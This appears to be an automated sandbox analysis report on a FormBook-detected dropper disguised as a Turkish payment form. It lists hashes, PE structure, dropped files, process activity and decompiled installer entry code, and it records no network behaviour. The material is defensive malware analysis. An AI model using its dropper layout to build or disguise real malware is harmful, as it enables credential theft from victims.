Sample file name:	#U00d6DEME FORMU.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.evad.winEXE@5/4@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 95.1% (good quality ratio 88.7%) Quality average: 77.8% Quality standard deviation: 29.6%
HCA Information:	Successful, ratio: 95% Number of executed functions: 36 Number of non-executed functions: 49
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\erltu.exe

Download File

Process:	C:\Users\user\Desktop\#U00d6DEME FORMU.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	134144
Entropy (8bit):	6.41218091663839
Encrypted:	false
SSDEEP:	1536:dYTOG+x8+YaGDARvmJVBqNvnlajcCOO0LdXU8JiA1Oyrx9WTqIDEJ+ksaSIJnXSU:JfbnR6BqNvncvhw9WTfEcLa4iG5skW
MD5:	2603B527A791BAA25AC589C33B254470
SHA1:	65EBDA93314517E098138BD9670ECCB345C7F662
SHA-256:	1AD07E46E78EB5A2AFC723FC2A8DF86D7B731A3CA853E4225622226EFC786F8F
SHA-512:	E5B3A208581A1B46382CC9D91D5C4FD3EE36DE741E57A1DB407F3A0B0602CC6678C7DBDCEB8DEE02614E1340FC7876DCD5088AB65DC74910A429CF21DAC6B579
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 48%, Browse Antivirus: ReversingLabs, Detection: 44%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(.}c{.}c{.}c{./.{.}c{./.{.}c{./.{.}c{(.bz.}c{.}b{.}c{y.gz.}c{y..{.}c{y.az.}c{Rich.}c{........................PE..L......b..........................................@..........................`............@..........................................@.......................P..........T...............................@............................................text...5........................... ..`.rdata..>N.......P..................@..@.data....1..........................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\fvcshciph

Download File

Process:	C:\Users\user\Desktop\#U00d6DEME FORMU.exe
File Type:	data
Category:	dropped
Size (bytes):	5310
Entropy (8bit):	6.093682530663886
Encrypted:	false
SSDEEP:	96:Wr9SaelkbOMBZUKzrCJEjZUFdPTzZoXeIPyHbODrnV/G8XhiOOAT/jOsu1p4w/k/:K9Sa3OEsoUXTzqbPRJSB1BRV0BDnR
MD5:	4E6A59FE3DCD5B83B64609193D85528E
SHA1:	1E0F857CD72F2984A09E821DCEA318CD2863B217
SHA-256:	7C5E9EC5245DE0AF358577C4E78B2F24B3810E626E2F29B178B638B04FB86860
SHA-512:	DFDE155F973F2B13174B6FB9A2238677D79F49BBE9BACFF6A0046BA79B8BE23A861E56C8F14F4587FA52DCC81CA38FAC142C287D19E3AB4B4FD46155D14C3AB2
Malicious:	false
Reputation:	low
Preview:	.....O..}.HMNA}_...A.^..?..A.^..?.}_...?.....}_...o..oX.?......s?.sO..o..oX.?.......s?.sO..o..oX.?.......s?.sO..o..oX.?...t...s?.sO.}7X.n"R.@e...?..s?.sO.?X}..-.s?.sG.?.G....-.RXC.?..O....s?.ANs_.}.R-.....}....%_..o.C.o.B.o.K@.o.KC.o.I.o...lXQ0...Q0sD.(}..o..o.KB.?...s?.._.......<......}...._.I.?.I......O...A.^..?..?....?.m(.?....GX...<..sO.s?..?...H.G.s..?..O.....P..i.:....P......P^..i.h....N......P...i.F....<......O..}...A.^..?.?.X....?.s?.}7..l..?.....?.Hs?..?.0s?....0.....l>.?..R.Ce..s<..sL...?.R.C...s<..sL..R.R.@e...<...P^..i...........s?....?..o..2...s?.}7..l.}_....?......?.....O..}.H.A.^..?.?......?.s?.}7..l..?.....?.Hs?..?.0s?..........\|r....?..R.Ce..s<..sL...?..R.C...s<..sL...?X.R.C..s<..sL...?.-.R.Be..s<..sD...?.R.C...s<..sL..R.R.@e...<..P..i..........s?.}7..l..?.G.s....o..o..oX.o..o..#...s?.}7..l.}_....?......?.....O..}.T.?.X....?.s?.}7..l..?.....?.Hs?..?.0s?.........l>.?..R.Ce..s<..sL..?..R.C...s<..sL..R.R.@e...<..P...i.......$...s?....o..o....

C:\Users\user\AppData\Local\Temp\ka5y543suvwo

Download File

Process:	C:\Users\user\Desktop\#U00d6DEME FORMU.exe
File Type:	data
Category:	dropped
Size (bytes):	189951
Entropy (8bit):	7.990465363694904
Encrypted:	true
SSDEEP:	3072:idfJQ4gfu2P+FGvM99Z1MG/ZtaEwV74jIFaRVIm53ZvUs1tFbdKKabXj2:idRku2SG4vlZtaqI8RWm53RUivBYXK
MD5:	D922F036AA538A949728682FE98BF835
SHA1:	A850EDF8BFA9EC5694F512062DAFB58929215DEE
SHA-256:	5B6B55B1FA6DEC84C11C4127725ED66FB32394D8C09BE7C3771B43E12C6BFBC3
SHA-512:	14C2188E46699A4268A157E2B8D1C40EFFC8B915916E479CE5C04900A1DBBB8E995561E63A5AEF162F986165EBD1CA7CF5A975488046A524C2498282DECB0A6B
Malicious:	false
Reputation:	low
Preview:	..k&..c.w..=.`....Zt..~O\\.Cw.C.4A.$g..-.uo.2t...a.4.4/.tSA..T....'#).`...e.._.#....n..9..!(;H#.%...3...E".4.!..XF......0..1.g..R.0.@..'.#.E...p7=r.m..r..H;17...+N=..xM..r.....R...$..K...Uo...{.........s.b..l..XX`d.3.pk(Ar.(.....)..voX..\|B.{&V0x3....O..c....g..>F.f.t..."......F4A..$j..-.o..t...a..4/.tSA'.T....I'...svN..Z...I...!.].@......\T...j.uv./a>..}.t.O.....0....b...{....a.h...K7.........n.;.99.$...0R.OV.r.....R.....RK...cRo.).{.........s.b...[<.o`.L^.pk(Ar.(.>...)..vo9S....B..&V0g3.i.gO..c.w.ug..>F..et.l.".....C.4A.$g..-.uo.2t...a.4.4/.tSA'.T....I'...svN..Z...I...!.].@......\T...j.uv./a>..}.t.O.....0....b...{....a.h...K7.........n.;.99.$...0R.OV.r.....R...$..K..!.Uo.U.{.........s.b...[<.o`dL^.pk(Ar.(.>...)..vo9S....B..&V0g3.i.gO..c.w.ug..>F..et.l.".....C.4A.$g..-.uo.2t...a.4.4/.tSA'.T....I'...svN..Z...I...!.].@......\T...j.uv./a>..}.t.O.....0....b...{....a.h...K7.........n.;.99.$...0R.OV.r.....R...$..K..!.Uo.U.{.........s.b...[<.o`dL^.pk(Ar.(.

C:\Users\user\AppData\Local\Temp\nsz96AE.tmp

Download File

Process:	C:\Users\user\Desktop\#U00d6DEME FORMU.exe
File Type:	data
Category:	dropped
Size (bytes):	335245
Entropy (8bit):	7.531798748691562
Encrypted:	false
SSDEEP:	6144:HJPdRku2SG4vlZtaqI8RWm53RUivBYXpZpvncWMElGC:8WNSqHRWm53RdZYXp/cWMEl
MD5:	9D1B5193868454C6C8B9F0FEA6AA7C8E
SHA1:	02818918499AF004548E0C1F641AE9965F27AD13
SHA-256:	BFFEBF62D8473D23F0BA2001738071F94D53532D97D8D3A9B35CA272A8FBDFA5
SHA-512:	562776614426BC11294FC7DD8599AEE68FE14ACCA1F8DE671F3A33299A2225EE2735AA2BE3C569BC3EAB3733F4C34FB80187FCD4361DE844E41FABED250A58B5
Malicious:	false
Reputation:	low
Preview:	........,...................?...............................................................................................................................................................................................................................................................B...............*...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.940379937299889
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	#U00d6DEME FORMU.exe
File size:	278482
MD5:	0204546cc8568a60d97947c5fd6ccd49
SHA1:	ff7c492dd728279cd763af6fa525606431fc8db0
SHA256:	eddc1ee1fafda4fe7cf6d114276c992806f33d7527d346464bad7033875fbd66
SHA512:	24fb62695c5455d362fbc157446a2cb2a7ae248268c0786cbd91a79a40fa32baa4f984cbbb45a6dd9f678f26cde7b6a7eb31cf1146f0fbaf17f060b58fa5d077
SSDEEP:	6144:B0YuB3ZgxdaCVG/RF5JUVu0dXet0ojX1nQcznQ:eB3AdaC8/RFYTQ0QDQ
TLSH:	FB441247B7F054F7D1729E3215A3E699F232A34619A191C71FB0AEB9B03E9C1048B74B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........qJ...$...$...$./.{...$...%.;.$.".y...$..3....$.f."...$.Rich..$.........................PE..L.....iF.................Z.........

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General

Entrypoint:	0x4032fa
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4669CEB6 [Fri Jun 8 21:48:38 2007 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	55f3dfd13c0557d3e32bcbc604441dd3

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409170h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push ebx
call dword ptr [00407278h]
mov dword ptr [00423FD4h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F4E8h
call dword ptr [00407154h]
push 0040922Ch
push 00423720h
call 00007F2BD1003B38h
call dword ptr [004070B4h]
mov edi, 00429000h
push eax
push edi
call 00007F2BD1003B26h
push ebx
call dword ptr [00407108h]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423F20h], eax
mov eax, edi
jne 00007F2BD100139Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007F2BD1003619h
push eax
call dword ptr [00407218h]
mov dword ptr [esp+1Ch], eax
jmp 00007F2BD10013F5h
cmp cl, 00000020h
jne 00007F2BD1001398h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F2BD100138Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [esp+14h], 00000020h
jne 00007F2BD1001398h
inc eax
mov byte ptr [esp+14h], 00000022h
cmp byte ptr [eax], 0000002Fh
jne 00007F2BD10013C5h
inc eax
cmp byte ptr [eax], 00000053h
jne 00007F2BD10013A0h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x900	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x288	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x59ac	0x5a00	False	0.668142361111	data	6.45807821776	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x117a	0x1200	False	0.4453125	data	5.17513527374	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1afd8	0x400	False	0.6015625	data	4.98110806401	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x24000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x900	0xa00	False	0.409375	data	3.94448786242	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2c190	0x2e8	data	English	United States
RT_DIALOG	0x2c478	0x100	data	English	United States
RT_DIALOG	0x2c578	0x11c	data	English	United States
RT_DIALOG	0x2c698	0x60	data	English	United States
RT_GROUP_ICON	0x2c6f8	0x14	data	English	United States
RT_MANIFEST	0x2c710	0x1eb	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, CreateFileA, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, CloseHandle, ExitProcess, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

⊘No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: #U00d6DEME FORMU.exePID: 6304, Parent PID: 2776

General

Target ID:	0
Start time:	18:24:13
Start date:	27/05/2022
Path:	C:\Users\user\Desktop\#U00d6DEME FORMU.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\#U00d6DEME FORMU.exe"
Imagebase:	0x400000
File size:	278482 bytes
MD5 hash:	0204546CC8568A60D97947C5FD6CCD49
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: erltu.exePID: 6336, Parent PID: 6304

General

Target ID:	1
Start time:	18:24:15
Start date:	27/05/2022
Path:	C:\Users\user\AppData\Local\Temp\erltu.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph
Imagebase:	0x1010000
File size:	134144 bytes
MD5 hash:	2603B527A791BAA25AC589C33B254470
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.280690320.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.280690320.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.280690320.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 48%, Virustotal, Browse Detection: 44%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: erltu.exePID: 6356, Parent PID: 6336

General

Target ID:	2
Start time:	18:24:16
Start date:	27/05/2022
Path:	C:\Users\user\AppData\Local\Temp\erltu.exe
Wow64 process (32bit):
Commandline:	C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph
Imagebase:
File size:	134144 bytes
MD5 hash:	2603B527A791BAA25AC589C33B254470
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: #U00d6DEME FORMU.exePID: 6304, Parent PID: 2776COMMON

Execution Graph

Execution Coverage:	15.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.1%
Total number of Nodes:	1254
Total number of Limit Nodes:	27

Executed Functions

Function 004032FA Relevance: 72.0, APIs: 23, Strings: 18, Instructions: 265
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			_entry_() {
				struct _SHFILEINFOA _v356;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v392;
				int _v396;
				int _v400;
				signed int _v404;
				CHAR* _v408;
				int _v412;
				intOrPtr _v416;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				intOrPtr _t34;
				CHAR* _t38;
				char* _t41;
				signed int _t43;
				void* _t47;
				int _t49;
				signed int _t50;
				signed int _t53;
				int _t54;
				signed int _t58;
				intOrPtr _t69;
				intOrPtr _t75;
				void* _t77;
				void* _t87;
				void* _t89;
				char* _t94;
				signed int _t95;
				void* _t96;
				signed int _t97;
				signed int _t98;
				signed int _t101;
				CHAR* _t103;
				signed int _t104;
				void* _t105;
				intOrPtr _t111;
				char _t118;

				_t105 =  &_v384;
				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t97 = 0;
				_v380 = 0x20;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x423fd4 = _t34;
				SHGetFileInfoA(0x41f4e8, 0,  &_v356, 0x160, 0); // executed
				E00405AF4("fjvkkubvvke Setup", "NSIS Error");
				_t38 = GetCommandLineA();
				_t94 = "\"C:\\Users\\hardz\\Desktop\\#U00d6DEME FORMU.exe\" ";
				E00405AF4(_t94, _t38);
				 *0x423f20 = GetModuleHandleA(0);
				_t41 = _t94;
				if("\"C:\\Users\\hardz\\Desktop\\#U00d6DEME FORMU.exe\" " == 0x22) {
					_v404 = 0x22;
					_t41 =  &M00429001;
				}
				_t43 = CharNextA(E00405612(_t41, _v404));
				_v404 = _t43;
				while(1) {
					_t89 =  *_t43;
					_t107 = _t89;
					if(_t89 == 0) {
						break;
					}
					__eflags = _t89 - 0x20;
					if(_t89 != 0x20) {
						L5:
						__eflags =  *_t43 - 0x22;
						_v404 = 0x20;
						if( *_t43 == 0x22) {
							_t43 = _t43 + 1;
							__eflags = _t43;
							_v404 = 0x22;
						}
						__eflags =  *_t43 - 0x2f;
						if( *_t43 != 0x2f) {
							L15:
							_t43 = E00405612(_t43, _v404);
							__eflags =  *_t43 - 0x22;
							if(__eflags == 0) {
								_t43 = _t43 + 1;
								__eflags = _t43;
							}
							continue;
						} else {
							_t43 = _t43 + 1;
							__eflags =  *_t43 - 0x53;
							if( *_t43 == 0x53) {
								__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
								if(( *(_t43 + 1) | 0x00000020) == 0x20) {
									_t97 = _t97 | 0x00000002;
									__eflags = _t97;
								}
							}
							__eflags =  *_t43 - 0x4352434e;
							if( *_t43 == 0x4352434e) {
								__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
								if(( *(_t43 + 4) | 0x00000020) == 0x20) {
									_t97 = _t97 | 0x00000004;
									__eflags = _t97;
								}
							}
							__eflags =  *((intOrPtr*)(_t43 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t43 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t43 - 2)) = 0;
								_t44 = _t43 + 2;
								__eflags = _t43 + 2;
								E00405AF4("C:\\Users\\hardz\\AppData\\Local\\Temp", _t44);
								L20:
								_t103 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t103);
								_t47 = E004032C6(_t107);
								_t108 = _t47;
								if(_t47 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t49 = E00402C7D(_t109, _t97); // executed
									_v412 = _t49;
									if(_t49 != 0) {
										L32:
										ExitProcess(); // executed
										__imp__OleUninitialize(); // executed
										if(_v404 == 0) {
											__eflags =  *0x423fb4; // 0x0
											if(__eflags != 0) {
												_t104 = E00405DDA(3);
												_t98 = E00405DDA(4);
												_t53 = E00405DDA(5);
												__eflags = _t104;
												_t95 = _t53;
												if(_t104 != 0) {
													__eflags = _t98;
													if(_t98 != 0) {
														__eflags = _t95;
														if(_t95 != 0) {
															_t58 =  *_t104(GetCurrentProcess(), 0x28,  &_v392);
															__eflags = _t58;
															if(_t58 != 0) {
																 *_t98(0, "SeShutdownPrivilege",  &_v396);
																_v412 = 1;
																_v400 = 2;
																 *_t95(_v416, 0,  &_v412, 0, 0, 0);
															}
														}
													}
												}
												_t54 = ExitWindowsEx(2, 0);
												__eflags = _t54;
												if(_t54 == 0) {
													E0040140B(9);
												}
											}
											_t50 =  *0x423fcc; // 0xffffffff
											__eflags = _t50 - 0xffffffff;
											if(_t50 != 0xffffffff) {
												_v396 = _t50;
											}
											ExitProcess(_v396);
										}
										E004053C2(_v404, 0x200010);
										ExitProcess(2);
									}
									_t111 =  *0x423f34; // 0x0
									if(_t111 == 0) {
										L31:
										 *0x423fcc =  *0x423fcc | 0xffffffff;
										_v400 = E004036A1();
										goto L32;
									}
									_t101 = E00405612(_t94, 0);
									while(_t101 >= _t94) {
										__eflags =  *_t101 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t101 = _t101 - 1;
										__eflags = _t101;
									}
									_t113 = _t101 - _t94;
									_v408 = "Error launching installer";
									if(_t101 < _t94) {
										lstrcatA(_t103, "~nsu.tmp");
										_t99 = "C:\\Users\\hardz\\Desktop";
										if(lstrcmpiA(_t103, "C:\\Users\\hardz\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t103, 0);
										SetCurrentDirectoryA(_t103);
										_t118 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
										if(_t118 == 0) {
											E00405AF4("C:\\Users\\hardz\\AppData\\Local\\Temp", _t99);
										}
										E00405AF4(0x424000, _v396);
										 *0x424400 = 0x41;
										_t96 = 0x1a;
										do {
											_t69 =  *0x423f28; // 0x6ddfd8
											_push( *((intOrPtr*)(_t69 + 0x120)));
											_push(0x41f0e8);
											E00405B16(0, _t96, 0x41f0e8);
											DeleteFileA(0x41f0e8);
											if(_v416 != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\#U00d6DEME FORMU.exe", 0x41f0e8, 1) != 0) {
												_push(0);
												_push(0x41f0e8);
												E00405842();
												_t75 =  *0x423f28; // 0x6ddfd8
												_push( *((intOrPtr*)(_t75 + 0x124)));
												_push(0x41f0e8);
												E00405B16(0, _t96, 0x41f0e8);
												_t77 = E00405361(0x41f0e8);
												if(_t77 != 0) {
													CloseHandle(_t77);
													 *((intOrPtr*)(_t105 + 0x10)) = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t96 = _t96 - 1;
										} while (_t96 != 0);
										_push(0);
										_push(_t103);
										E00405842();
										goto L32;
									}
									 *_t101 = 0;
									_t102 = _t101 + 4;
									if(E004056C8(_t113, _t101 + 4) == 0) {
										goto L32;
									}
									E00405AF4("C:\\Users\\hardz\\AppData\\Local\\Temp", _t102);
									E00405AF4("C:\\Users\\hardz\\AppData\\Local\\Temp", _t102);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t103, 0x3fb);
								lstrcatA(_t103, "\\Temp");
								_t87 = E004032C6(_t108);
								_t109 = _t87;
								if(_t87 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t43 = _t43 + 1;
						__eflags =  *_t43 - 0x20;
					} while ( *_t43 == 0x20);
					goto L5;
				}
				goto L20;
			}

0x004032fa
0x00403306
0x0040330a
0x00403312
0x00403314
0x00403319
0x00403320
0x00403326
0x0040333c
0x0040334c
0x00403351
0x00403357
0x0040335e
0x00403371
0x00403376
0x00403378
0x0040337a
0x0040337f
0x0040337f
0x0040338f
0x00403395
0x004033fe
0x004033fe
0x00403400
0x00403402
0x00000000
0x00000000
0x0040339b
0x0040339e
0x004033a6
0x004033a6
0x004033a9
0x004033ae
0x004033b0
0x004033b0
0x004033b1
0x004033b1
0x004033b6
0x004033b9
0x004033ee
0x004033f3
0x004033f8
0x004033fb
0x004033fd
0x004033fd
0x004033fd
0x00000000
0x004033bb
0x004033bb
0x004033bc
0x004033bf
0x004033c7
0x004033ca
0x004033cc
0x004033cc
0x004033cc
0x004033ca
0x004033cf
0x004033d5
0x004033dd
0x004033e0
0x004033e2
0x004033e2
0x004033e2
0x004033e0
0x004033e5
0x004033ec
0x00403406
0x00403409
0x00403409
0x00403412
0x00403417
0x00403417
0x00403422
0x00403428
0x0040342d
0x0040342f
0x00403451
0x00403456
0x0040345d
0x00403464
0x00403468
0x004034cf
0x004034cf
0x004034d4
0x004034de
0x004035c9
0x004035cf
0x004035da
0x004035e3
0x004035e5
0x004035ea
0x004035ec
0x004035ee
0x004035f0
0x004035f2
0x004035f4
0x004035f6
0x00403606
0x00403608
0x0040360a
0x00403617
0x00403626
0x0040362e
0x00403636
0x00403636
0x0040360a
0x004035f6
0x004035f2
0x0040363b
0x00403641
0x00403643
0x00403647
0x00403647
0x00403643
0x0040364c
0x00403651
0x00403654
0x00403656
0x00403656
0x0040365e
0x0040365e
0x004034ed
0x004034f4
0x004034f4
0x0040346a
0x00403470
0x004034bf
0x004034bf
0x004034cb
0x00000000
0x004034cb
0x00403479
0x00403486
0x0040347d
0x00403483
0x00000000
0x00000000
0x00403485
0x00403485
0x00403485
0x0040348a
0x0040348c
0x00403494
0x00403500
0x00403505
0x00403514
0x00000000
0x00000000
0x00403518
0x0040351f
0x00403525
0x0040352b
0x00403533
0x00403533
0x00403541
0x00403548
0x00403551
0x00403557
0x00403557
